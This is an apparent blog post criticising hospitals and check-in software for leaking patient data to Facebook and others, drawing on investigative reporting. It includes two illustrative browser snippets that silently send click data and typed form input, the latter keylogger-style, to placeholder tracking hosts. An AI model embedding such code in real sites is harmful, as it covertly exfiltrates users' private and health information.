
Do You Know Where Your Health Data is Going? You Should.

October 18, 2022 Janice Karin

One of the biggest criticisms we heard of the CMS-mandated Patient Access APIs was that they move protected health data outside the purview of HIPAA, leaving patient privacy free to be violated. Many want HIPAA or HIPAA-like protections extended to third parties handling health data. That argument might hold more weight if HIPAA were actually protecting the health information of patients at organizations that are bound by its rules. Sadly, that's not always the case.

In the past few weeks, investigative reporters published three articles showing just how badly some of our healthcare organizations are violating patient privacy. The articles addressed data tracking and collection software embedded in provider websites that offer online appointment scheduling, in patient portals, and in patient check-in software used by providers. That software sent data to Facebook, to Google, to Amazon, to Oracle, and elsewhere (including to at least one data broker). Some of the websites included session trackers that potentially recorded every click made on those pages.

Two [1] [2] of the three articles were from The Markup, a non-profit newsroom doing data-driven reporting on how technology affects society. The third - a narrower look at one specific patient check-in application (Phreesia) - was from The Washington Post. The Markup articles, in particular, explain their investigative process and findings in detail, backing them up with data and evidence. They are compelling and horrifying at the same time.

Both of these scenarios involve the transfer and collection of PHI. In the case of Facebook, this is done without consent and entirely outside of the HIPAA framework. In the case of Phreesia (which typically signs Business Associate Agreements with the providers who use it in order to access the data), selling the data is ostensibly done with patient consent and under the guise of offering more personalized service to the patient. However, that consent is buried deep within a longer consent form that's part of the check-in process and, unless you are used to reading and absorbing every word of lengthy consent forms, it is likely to be mistaken for simply consenting to the visit.

The Markup research is particularly interesting. They looked at Newsweek's 100 Top Hospitals and found that 33 of them use Meta Pixel, tracking software that sends data to Facebook whenever a button is clicked on a page where it's installed. Even if a user isn't logged in or hasn't yet provided their identity, the packet includes the visitor's IP address, which is often static and can be used to identify a patient or household.
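For readers who haven't seen how pixel-style trackers work under the hood, the basic pattern is simple enough to sketch in a few lines of browser code. The sketch below is illustrative only - the endpoint and field names are our invention, not Meta's actual implementation - but it shows why a single embedded script can report every click, and why the IP address comes along for free.

```typescript
// Minimal sketch of a pixel-style click tracker. The endpoint and
// parameter names here are illustrative, not Meta's actual API.
const TRACKER_ENDPOINT = "https://tracker.example.com/collect";

document.addEventListener("click", (event) => {
  const clicked = (event.target as HTMLElement).closest("button, a");
  if (!clicked) return;

  const params = new URLSearchParams({
    event: "ButtonClick",
    buttonText: clicked.textContent?.trim() ?? "", // e.g. "Schedule Appointment"
    pageUrl: location.href,     // may embed search terms or selected conditions
    referrer: document.referrer,
  });

  // A 1x1 "pixel" image request smuggles the data out as a GET query.
  // The visitor's IP address arrives automatically with the HTTP request;
  // the script never has to collect it explicitly.
  new Image().src = `${TRACKER_ENDPOINT}?${params.toString()}`;
});
```

Because the exfiltration is an ordinary image fetch, nothing about it looks unusual to the browser - which is part of why this pattern is so pervasive and so hard for patients to detect.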

The Markup contacted each of the 33 hospitals with the tracker and gave them the chance both to respond and to remove it. The list includes many of the most well-known and prestigious hospitals across the country, including some here in Massachusetts. Only a few of the hospitals they contacted removed the software, and even fewer responded to the request for comment (mostly with generic statements about taking patient privacy seriously).

When installed on pages used for online scheduling, the information shared typically included the text of the button clicked, the search term supplied or condition selected to generate the list of available appointments, and the name of the doctor chosen for treatment. This is bad enough, but it is mainly inferred information rather than direct patient information (searching for a doctor to see about Alzheimer's doesn't necessarily mean the patient has Alzheimer's - but they almost certainly have some related symptoms). However, if follow-up appointments are also made through this mechanism, rather than just initial appointments tied to clinician discovery, the inference becomes much stronger. Appointment frequency can also reveal when a particular condition is bothering a patient, how severe their case is, and more.

In addition to scheduling pages, seven of the hospitals they examined also used Meta Pixel in their online patient portals. The Markup discovered this with the help of patient volunteers who consented to share information about Meta Pixel usage, and the data it transmitted, so the reporters could see exactly what was being collected. In these cases actual, direct patient health data was sent via the Meta Pixel tracker, including the names of medications patients take, descriptions of their allergic reactions, and details about upcoming scheduled appointments. Five of the seven removed the tracker from their patient portals after being contacted by The Markup.

The Markup bent over backwards to be fair to the hospitals in question. There are limited circumstances where this type of data collection is legal: it generally requires either specific contracts between the organizations or explicit patient consent (see the Phreesia comments above). They contacted all of the involved organizations to see whether contracts that would allow this type of data collection were in place. Neither Meta/Facebook nor any of the hospitals said such contracts existed. Nor was there any evidence that consent was collected (even obscurely) from website or portal visitors - the other legal avenue to data collection. We wonder, though: even if a business agreement of some sort is in place to allow data transfer, does that absolve the companies of the need for separate consent to track user interactions with the system?

In their second article, The Markup did a deep dive into the tracking found at a large network of children's hospitals. In addition to a Meta Pixel sending data to Facebook and a Google Analytics tracker, they found 25 ad trackers, 38 cookies, and signs of keystroke collection. A Meta spokesperson said that sending sensitive data via Meta Pixel is against policy and that health data is supposedly blocked from storage, but they did not comment on how Meta defines health data or whether the data from this organization (or any of the others) was actually filtered out. Given that the only data being collected from either the scheduling sites or the patient portals is health information, it strains credulity to believe that none of it was retained or used.
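Keystroke collection - often part of "session replay" tooling - follows a similarly simple pattern. The sketch below is again illustrative: the endpoint is hypothetical, vendor scripts vary widely, and we don't know exactly what this hospital network's trackers did. What it shows is why text can be captured as it is typed, before any form is ever submitted.

```typescript
// Illustrative sketch of session-replay-style keystroke capture.
// The endpoint is hypothetical; real vendor scripts vary widely.
const keystrokeBuffer: Array<{ field: string; value: string; ts: number }> = [];

document.addEventListener("input", (event) => {
  const el = event.target as HTMLInputElement;
  keystrokeBuffer.push({
    field: el.name || el.id, // e.g. "symptoms" or "current-medications"
    value: el.value,         // the full text typed so far, submitted or not
    ts: Date.now(),
  });
});

// Periodically flush whatever has been typed to the vendor's server.
setInterval(() => {
  if (keystrokeBuffer.length === 0) return;
  navigator.sendBeacon(
    "https://replay.example.com/ingest", // hypothetical endpoint
    JSON.stringify(keystrokeBuffer.splice(0)),
  );
}, 5000);
```

Note that abandoning a half-completed form offers no protection under this pattern: the text was transmitted while it was being typed.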

These incidents are disturbing. While we all know people should be more vigilant about reading consent forms, that doesn't help when no consent forms exist. Further, if a patient needs care and is presented with a form to sign, most will sign it rather than walk away from an appointment. This is doubly true for people who have been waiting a long time for the appointment, have taken time off work or arranged for childcare (or both), or have otherwise spent time, energy, and money to make the appointment happen. These forms are also long, technical, written in the Legalese dialect of English, and require a lot of patience and experience for non-lawyers to understand. When presented amidst a slew of other forms - particularly forms that seem more directly relevant to a visit, such as health history or current symptoms - and especially under a time crunch to finish the annoying paperwork and get to the important parts of the visit, how many people are actually going to read and understand every clause and sentence of a consent form?

That doesn't even get into other equity and accessibility issues. Will staff read a long and complex form to a patient who can't see it? Is someone even available to do that before a telehealth visit starts? Are consent forms available in other languages? Are non-technically-savvy users able to understand the implications of what they're being asked to sign? And so on.

In the case of check-in software, the data isn't just collected to be sold (although it is). It's used to promote possibly relevant prescription drugs and similar products to patients right before they see a clinician for the conditions those products treat. Putting aside any questions about whether advertising prescription drugs should be allowed at all, this type of advertisement is disruptive to the care process. In this era of limited appointment time, it invites patients to use that time asking their clinicians about products they were just told might help them. Furthermore, since the advertisement appeared within the framework of their appointment, a patient might be forgiven for thinking that their medical providers approved it and were simply reminding them to ask about something already deemed appropriate for their care. Perhaps every so often the advertised product is a good fit for the patient, but that won't always be the case, and it will be harder to convince the patient that they shouldn't get the product when they were just told - under the imprimatur of the hospital - that they should.

Even more disturbing is sending health-related data to Facebook without consent. This data gets used for everything - every part of a person's life in 21st-century America is affected by the way Facebook interconnects data. This is bad enough when permission is given, or when a patient has some reasonable expectation that Facebook could see the data, but it is unconscionable when they have every reason to think the data is hidden from prying eyes. Knowing what types of medical appointments a patient is trying to make allows Facebook to infer a lot about which ads to show that patient, or which other parties might be interested in buying their data. Knowing which doctors the patient chooses to see could allow Facebook to infer the types of people the patient trusts, especially if there are demographic similarities among their various clinicians. Knowing the search terms they use allows Facebook to understand and analyze their specific word patterns, both to identify them in other contexts and to frame the language it presents in a flow inherently more comfortable for that specific person (we don't know if this type of analysis is happening, but it could be).

The most disturbing case of all is the intrusion of these trackers into patient portals. One could argue that online appointment scheduling happens in the open and thus a savvy person should assume it might be monitored (we reject this argument, but some believe it). No one, however, could legitimately argue that it's appropriate under these circumstances to share information from inside password-protected software deliberately designed to hold PHI with Facebook. In general, the data collected from appointment scheduling leads to inferences (sometimes strong inferences), but data from a patient portal is explicit, factual data about that patient. It is much more valuable, and patients have a reasonable expectation that it's well protected. They have been told repeatedly that it's well protected. They have been told repeatedly that it's illegal for it not to be well protected. And yet, here we are.

Will an article in The Washington Post - as highly regarded and widely read as that outlet is - force check-in software to change its behavior? Even if it does, how many more companies with peripheral interactions with the healthcare system are doing similar things? We doubt the reporting will land at all with Facebook or Meta, but will a fantastic, well-researched, and well-documented report in the less widely read Markup change the behavior of hospital systems across the country? Even if these particular trackers sharing data about these particular interactions are removed, who's to say there aren't others in place?

Consent forms are long, difficult to understand, and problematic, and they need to be improved - but how do we deal with data sharing outside of consent entirely? We've all heard of (and sometimes rely on) security by obscurity; this is lack of privacy by audacity. We shouldn't have to seek out and monitor every single interaction in every single system at every single provider, payer, or other healthcare organization in the country to be confident that our health data isn't being shared without our consent. We shouldn't have to rely on volunteers who give investigative journalists access to their private health information to prove privacy violations once we suspect they're happening. Limiting advertising of prescription drugs and prescription-only medical devices would help, as it would take away a major market for the data, but there will always be venues that find health data useful. We can always publicly shame companies, but that only goes so far if they're willing to be audacious - and memories fade. What else can we do? We'd love to hear your thoughts.
